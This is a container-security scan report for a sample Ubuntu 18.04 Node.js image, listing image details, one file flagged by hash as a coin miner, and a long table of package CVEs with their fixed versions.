samples/82zge/zagit

Region: eastus
Scan Summary
Critical vulnerabilities: 2
Malicious files: 1
Last scan: 1 year, 8 months ago
Type of scan: Prevasio CSPM
Scan duration: 2 minutes and 53 seconds

Image Details
Image URI: prevasio.azurecr.io/samples/82zge/zagit
Image tags: tag1
Digest: sha256:2821e49e2914a3c6170e4b6fe23e00323d1c2af19d18cd150dc9dc5fef798fc4
Created: 5 years ago
Compressed size: 204.72 MB
Uncompressed size: 474.68 MB
OS/architecture: linux/amd64
OS distribution: ubuntu 18.04
Working directory: deadhash
ENTRYPOINT:
CMD: /bin/sh -c npm start
User:
Ports:
Volumes:
Environment variables: PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Filename: /deadhash/F7kqTuSTqEwrM0ci
File size: 946.95 kB
SHA 256: 8e617d8502045b98ca796314cec0675f4fa451a6887b0fa9f655d18d622f1d4d
Threat name: Multios.Coinminer.Miner-6781728-2
Report: VirusTotal

Overview
Critical: 2
High: 70
Medium: 862
Low: 668
Informational: 0

Vulnerabilities (1,000)
Severity Name Package Version Fixed in Description Package:version
Critical CVE-2021-42740 shell-quote 1.6.1 1.7.3 The shell-quote package before 1.7.3 for Node.js allows command inject ... shell-quote:1.6.1
Critical CVE-2021-31597 xmlhttprequest-ssl 1.5.3 1.6.1 xmlhttprequest-ssl: SSL certificate validation disabled by default xmlhttprequest-ssl:1.5.3
High CVE-2018-0501 apt 1.6.1 1.6.3ubuntu0.1 The mirror:// method implementation in Advanced Package Tool (APT) 1.6 ... apt:1.6.1
High CVE-2019-3462 apt 1.6.1 1.6.6ubuntu0.1 Incorrect sanitation of the 302 redirect field in HTTP transport metho ... apt:1.6.1
High CVE-2018-0501 libapt-pkg5.0 1.6.1 1.6.3ubuntu0.1 The mirror:// method implementation in Advanced Package Tool (APT) 1.6 ... libapt-pkg5.0:1.6.1
High CVE-2019-3462 libapt-pkg5.0 1.6.1 1.6.6ubuntu0.1 Incorrect sanitation of the 302 redirect field in HTTP transport metho ... libapt-pkg5.0:1.6.1
High CVE-2022-25235 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Malformed 2- and 3-byte UTF-8 sequences can lead to arbitrary code execution libexpat1:2.2.5-3
High CVE-2022-25236 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Namespace-separator characters in "xmlns[:prefix]" attribute values can lead to arbitrary code execution libexpat1:2.2.5-3
High CVE-2022-24407 libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.4 cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-2:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2022-24407 libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.4 cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-modules:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2022-24407 libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.4 cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-modules-db:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2020-1971 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.5 openssl: EDIPARTYNAME NULL pointer de-reference libssl1.0.0:1.0.2n-1ubuntu5.1
High CVE-2022-0778 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.8 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates libssl1.0.0:1.0.2n-1ubuntu5.1
High CVE-2020-1971 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.7 openssl: EDIPARTYNAME NULL pointer de-reference libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2021-3449 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.9 openssl: NULL pointer dereference in signature_algorithms processing libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2021-3711 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.13 openssl: SM2 Decryption Buffer Overflow libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2022-0778 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.15 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2018-16864 libsystemd0 237-3ubuntu10 237-3ubuntu10.11 systemd: stack overflow when calling syslog from a command with long cmdline libsystemd0:237-3ubuntu10
High CVE-2018-16865 libsystemd0 237-3ubuntu10 237-3ubuntu10.11 systemd: stack overflow when receiving many journald entries libsystemd0:237-3ubuntu10
High CVE-2021-33910 libsystemd0 237-3ubuntu10 237-3ubuntu10.49 systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash libsystemd0:237-3ubuntu10
High CVE-2018-16864 libudev1 237-3ubuntu10 237-3ubuntu10.11 systemd: stack overflow when calling syslog from a command with long cmdline libudev1:237-3ubuntu10
High CVE-2018-16865 libudev1 237-3ubuntu10 237-3ubuntu10.11 systemd: stack overflow when receiving many journald entries libudev1:237-3ubuntu10
High CVE-2021-33910 libudev1 237-3ubuntu10 237-3ubuntu10.49 systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash libudev1:237-3ubuntu10
High CVE-2018-12126 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12127 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12130 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12207 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 hw: Machine Check Error on Page Size Change (IFU) linux-libc-dev:4.15.0-24.26
High CVE-2018-15471 linux-libc-dev 4.15.0-24.26 4.15.0-39.42 kernel: net: xen: Linux netback driver OOB access in hash handling (XSA-270) linux-libc-dev:4.15.0-24.26
High CVE-2018-15572 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 Kernel: hw: cpu: userspace-userspace spectreRSB attack linux-libc-dev:4.15.0-24.26
High CVE-2018-15594 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: Mishandling of indirect calls weakens Spectre mitigation for paravirtual guests linux-libc-dev:4.15.0-24.26
High CVE-2018-17182 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: Use-after-free in the vmacache_flush_all function resulting in a possible privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2018-3620 linux-libc-dev 4.15.0-24.26 4.15.0-32.35 CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF) linux-libc-dev:4.15.0-24.26
High CVE-2018-3646 linux-libc-dev 4.15.0-24.26 4.15.0-32.35 CVE-2018-3620 CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF) linux-libc-dev:4.15.0-24.26
High CVE-2018-5390 linux-libc-dev 4.15.0-24.26 4.15.0-30.32 kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack) linux-libc-dev:4.15.0-24.26
High CVE-2018-5391 linux-libc-dev 4.15.0-24.26 4.15.0-32.35 kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack) linux-libc-dev:4.15.0-24.26
High CVE-2019-0155 linux-libc-dev 4.15.0-24.26 4.15.0-70.79 hw: Intel GPU blitter manipulation can allow for arbitrary kernel memory write linux-libc-dev:4.15.0-24.26
High CVE-2019-11135 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 hw: TSX Transaction Asynchronous Abort (TAA) linux-libc-dev:4.15.0-24.26
High CVE-2019-11477 linux-libc-dev 4.15.0-24.26 4.15.0-52.56 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service linux-libc-dev:4.15.0-24.26
High CVE-2019-11478 linux-libc-dev 4.15.0-24.26 4.15.0-52.56 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service linux-libc-dev:4.15.0-24.26
High CVE-2019-14835 linux-libc-dev 4.15.0-24.26 4.15.0-64.73 kernel: vhost-net: guest to host kernel escape during migration linux-libc-dev:4.15.0-24.26
High CVE-2020-11884 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 Kernel: s390: page table upgrade in secondary address mode may lead to privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2020-12351 linux-libc-dev 4.15.0-24.26 4.15.0-122.124 kernel: net: bluetooth: type confusion while processing AMP packets linux-libc-dev:4.15.0-24.26
High CVE-2020-12654 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: heap-based buffer overflow in mwifiex_ret_wmm_get_status function in drivers/net/wireless/marvell/mwifiex/wmm.c linux-libc-dev:4.15.0-24.26
High CVE-2020-14386 linux-libc-dev 4.15.0-24.26 4.15.0-117.118 kernel: memory corruption in net/packet/af_packet.c leads to elevation of privilege linux-libc-dev:4.15.0-24.26
High CVE-2020-16119 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: DCCP CCID structure use-after-free may lead to DoS or code execution linux-libc-dev:4.15.0-24.26
High CVE-2020-27170 linux-libc-dev 4.15.0-24.26 4.15.0-140.144 kernel: Speculation on pointer arithmetic against bpf_context pointer linux-libc-dev:4.15.0-24.26
High CVE-2020-27171 linux-libc-dev 4.15.0-24.26 4.15.0-140.144 kernel: Integer underflow when restricting speculative pointer arithmetic linux-libc-dev:4.15.0-24.26
High CVE-2020-28374 linux-libc-dev 4.15.0-24.26 4.15.0-132.136 kernel: SCSI target (LIO) write to any block on ILO backstore linux-libc-dev:4.15.0-24.26
High CVE-2020-29661 linux-libc-dev 4.15.0-24.26 4.15.0-136.140 kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free linux-libc-dev:4.15.0-24.26
High CVE-2021-22555 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: out-of-bounds write in xt_compat_target_from_user() in net/netfilter/x_tables.c linux-libc-dev:4.15.0-24.26
High CVE-2021-27365 linux-libc-dev 4.15.0-24.26 4.15.0-139.143 kernel: heap buffer overflow in the iSCSI subsystem linux-libc-dev:4.15.0-24.26
High CVE-2021-29154 linux-libc-dev 4.15.0-24.26 4.15.0-142.146 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation linux-libc-dev:4.15.0-24.26
High CVE-2021-33909 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: size_t-to-int conversion vulnerability in the filesystem layer linux-libc-dev:4.15.0-24.26
High CVE-2021-3493 linux-libc-dev 4.15.0-24.26 4.15.0-142.146 kernel: overlayfs file system caps privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2021-3600 linux-libc-dev 4.15.0-24.26 4.15.0-147.151 kernel: eBPF 32-bit source register truncation on div/mod linux-libc-dev:4.15.0-24.26
High CVE-2021-3609 linux-libc-dev 4.15.0-24.26 4.15.0-147.151 kernel: race condition in net/can/bcm.c leads to local privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2021-3653 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: SVM nested virtualization issue in KVM (AVIC support) linux-libc-dev:4.15.0-24.26
High CVE-2021-3656 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: SVM nested virtualization issue in KVM (VMLOAD/VMSAVE) linux-libc-dev:4.15.0-24.26
High CVE-2021-3715 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: use-after-free in route4_change() in net/sched/cls_route.c linux-libc-dev:4.15.0-24.26
High CVE-2021-4002 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: possible leak or corruption of data residing on hugetlbfs linux-libc-dev:4.15.0-24.26
High CVE-2022-0001 linux-libc-dev 4.15.0-24.26 4.15.0-171.180 hw: cpu: intel: Branch History Injection (BHI) linux-libc-dev:4.15.0-24.26
High CVE-2022-0002 linux-libc-dev 4.15.0-24.26 4.15.0-171.180 hw: cpu: intel: Intra-Mode BTI linux-libc-dev:4.15.0-24.26
High CVE-2022-0492 linux-libc-dev 4.15.0-24.26 4.15.0-173.182 kernel: cgroups v1 release_agent feature may allow privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2022-21499 linux-libc-dev 4.15.0-24.26 4.15.0-184.194 kernel: possible to use the debugger to write zero into a location of choice linux-libc-dev:4.15.0-24.26
High CVE-2022-29581 linux-libc-dev 4.15.0-24.26 4.15.0-180.189 kernel: Improper Update of Reference Count vulnerability in net/sched linux-libc-dev:4.15.0-24.26
High CVE-2020-1971 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.7 openssl: EDIPARTYNAME NULL pointer de-reference openssl:1.1.0g-2ubuntu4.1
High CVE-2021-3449 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.9 openssl: NULL pointer dereference in signature_algorithms processing openssl:1.1.0g-2ubuntu4.1
High CVE-2021-3711 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.13 openssl: SM2 Decryption Buffer Overflow openssl:1.1.0g-2ubuntu4.1
High CVE-2022-0778 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.15 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates openssl:1.1.0g-2ubuntu4.1
High CVE-2020-36048 engine.io 1.8.5 3.6.0 yarnpkg-socket.io/engine.io: allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport engine.io:1.8.5
High CVE-2020-36049 socket.io-parser 2.3.1 3.4.1, 3.3.2 yarnpkg-socket.io-parser: a denial of service (memory consumption) via a large packet because a concatenation approach is used socket.io-parser:2.3.1
High CVE-2020-28502 xmlhttprequest-ssl 1.5.3 1.6.2 nodejs-xmlhttprequest: Code injection through user input to xhr.send xmlhttprequest-ssl:1.5.3
Medium CVE-2020-27350 apt 1.6.1 1.6.12ubuntu0.2 apt: integer overflows and underflows while parsing .deb packages apt:1.6.1
Medium CVE-2020-3810 apt 1.6.1 1.6.12ubuntu0.1 Missing input validation in the ar/tar implementations of APT before v ... apt:1.6.1
Medium CVE-2019-14250 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in function apply_relocation in readelf.c binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14250 binutils-common 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils-common 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in function apply_relocation in readelf.c binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils-common 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-14250 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in function apply_relocation in readelf.c binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-12900 bzip2 1.0.6-8.1 1.0.6-8.1ubuntu0.2 bzip2: out-of-bounds write in function BZ2_decompress bzip2:1.0.6-8.1
Medium CVE-2018-1000858 dirmngr 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service dirmngr:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 dirmngr 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection dirmngr:2.2.4-1ubuntu1.1
Medium CVE-2022-1664 dpkg 1.19.0.5ubuntu2 1.19.0.5ubuntu2.4 Dpkg::Source::Archive in dpkg, the Debian package management system, b ... dpkg:1.19.0.5ubuntu2
Medium CVE-2022-1664 dpkg-dev 1.19.0.5ubuntu2 1.19.0.5ubuntu2.4 Dpkg::Source::Archive in dpkg, the Debian package management system, b ... dpkg-dev:1.19.0.5ubuntu2
Medium CVE-2019-5094 e2fsprogs 1.44.1-1 1.44.1-1ubuntu1.2 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write e2fsprogs:1.44.1-1
Medium CVE-2019-5188 e2fsprogs 1.44.1-1 1.44.1-1ubuntu1.3 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c e2fsprogs:1.44.1-1
Medium CVE-2022-1304 e2fsprogs 1.44.1-1 1.44.1-1ubuntu1.4 e2fsprogs: out-of-bounds read/write via crafted filesystem e2fsprogs:1.44.1-1
Medium CVE-2019-18218 file 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.3 file: heap-based buffer overflow in cdf_read_property_info in cdf.c file:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 file 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: out-of-bounds read in do_core_note in readelf.c file:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 file 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: do_core_note in readelf.c allows remote attackers to cause a denial of service file:1:5.32-2ubuntu0.1
Medium CVE-2018-17456 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.3 git: arbitrary code execution via .gitmodules git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2018-19486 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.4 git: Improper handling of PATH allows for commands to be executed from the current directory git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1348 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.5 git: Arbitrary path overwriting via export-marks in-stream command feature git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1350 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.5 git: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1351 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.5 git: Git mistakes some paths for relative paths allowing writing outside of the worktree while cloning git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1352 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.5 git: Files inside the .git directory may be overwritten during cloning via NTFS Alternate Data Streams git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1353 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.5 git: NTFS protections inactive when running Git in the Windows Subsystem for Linux git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2020-11008 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.7 git: Crafted URL containing new lines, empty host or lacks a scheme can cause credential leak git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2020-5260 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.6 git: Crafted URL containing new lines can cause credential leak git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2021-21300 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.8 git: remote code execution during clone operation on case-insensitive filesystems git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2021-40330 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.9 git: unexpected cross-protocol requests via a repository path containing a newline character git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2022-24765 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.11 git: On multi-user machines Git users might find themselves unexpectedly in a Git worktree git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2022-29187 git-man 1:2.17.1-1ubuntu0.1 1:2.17.1-1ubuntu0.12 git: Bypass of safe.directory protections git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2018-1000858 gnupg 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gnupg:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gnupg-l10n 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg-l10n:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg-l10n 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gnupg-l10n:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gnupg-utils 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg-utils:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg-utils 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gnupg-utils:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpg:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-agent 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-agent:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-agent 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpg-agent:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-wks-client 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-wks-client:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-wks-client 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpg-wks-client:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-wks-server 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-wks-server:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-wks-server 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpg-wks-server:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgconf 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgconf:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgconf 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpgconf:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgsm 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgsm:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgsm 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpgsm:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgv 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.2 gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgv:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgv 2.2.4-1ubuntu1.1 2.2.4-1ubuntu1.6 gpg: Signature spoofing via status line injection gpgv:2.2.4-1ubuntu1.1
Medium CVE-2022-1271 gzip 1.6-5ubuntu1 1.6-5ubuntu1.2 gzip: arbitrary-file-write vulnerability gzip:1.6-5ubuntu1
Medium CVE-2020-28196 krb5-locales 1.16-2build1 1.16-2ubuntu0.2 krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS krb5-locales:1.16-2build1
Medium CVE-2020-27350 libapt-pkg5.0 1.6.1 1.6.12ubuntu0.2 apt: integer overflows and underflows while parsing .deb packages libapt-pkg5.0:1.6.1
Medium CVE-2020-3810 libapt-pkg5.0 1.6.1 1.6.12ubuntu0.1 Missing input validation in the ar/tar implementations of APT before v ... libapt-pkg5.0:1.6.1
Medium CVE-2018-1000877 libarchive13 3.2.2-3.1 3.2.2-3.1ubuntu0.2 libarchive: Double free in RAR decoder resulting in a denial of service libarchive13:3.2.2-3.1
Medium CVE-2018-1000878 libarchive13 3.2.2-3.1 3.2.2-3.1ubuntu0.2 libarchive: Use after free in RAR decoder resulting in a denial of service libarchive13:3.2.2-3.1
Medium CVE-2019-1000020 libarchive13 3.2.2-3.1 3.2.2-3.1ubuntu0.3 libarchive: Infinite recursion in archive_read_support_format_iso9660.c resulting in denial of service libarchive13:3.2.2-3.1
Medium CVE-2019-18408 libarchive13 3.2.2-3.1 3.2.2-3.1ubuntu0.5 libarchive: use-after-free in archive_read_format_rar_read_data when there is an error in the decompression of an archive entry libarchive13:3.2.2-3.1
Medium CVE-2019-14250 libbinutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 libbinutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow in function apply_relocation in readelf.c libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 libbinutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-20367 libbsd0 0.8.7-1 0.8.7-1ubuntu0.1 nlist.c in libbsd before 0.10.0 has an out-of-bounds read during a com ... libbsd0:0.8.7-1
Medium CVE-2019-12900 libbz2-1.0 1.0.6-8.1 1.0.6-8.1ubuntu0.2 bzip2: out-of-bounds write in function BZ2_decompress libbz2-1.0:1.0.6-8.1
Medium CVE-2018-11236 libc-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc-bin:2.27-3ubuntu1
Medium CVE-2018-11237 libc-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc-bin:2.27-3ubuntu1
Medium CVE-2018-19591 libc-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc-bin:2.27-3ubuntu1
Medium CVE-2020-1751 libc-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: array overflow in backtrace functions for powerpc libc-bin:2.27-3ubuntu1
Medium CVE-2021-3999 libc-bin 2.27-3ubuntu1 2.27-3ubuntu1.5 glibc: Off-by-one buffer overflow/underflow in getcwd() libc-bin:2.27-3ubuntu1
Medium CVE-2018-11236 libc-dev-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc-dev-bin:2.27-3ubuntu1
Medium CVE-2018-11237 libc-dev-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc-dev-bin:2.27-3ubuntu1
Medium CVE-2018-19591 libc-dev-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc-dev-bin:2.27-3ubuntu1
Medium CVE-2020-1751 libc-dev-bin 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: array overflow in backtrace functions for powerpc libc-dev-bin:2.27-3ubuntu1
Medium CVE-2021-3999 libc-dev-bin 2.27-3ubuntu1 2.27-3ubuntu1.5 glibc: Off-by-one buffer overflow/underflow in getcwd() libc-dev-bin:2.27-3ubuntu1
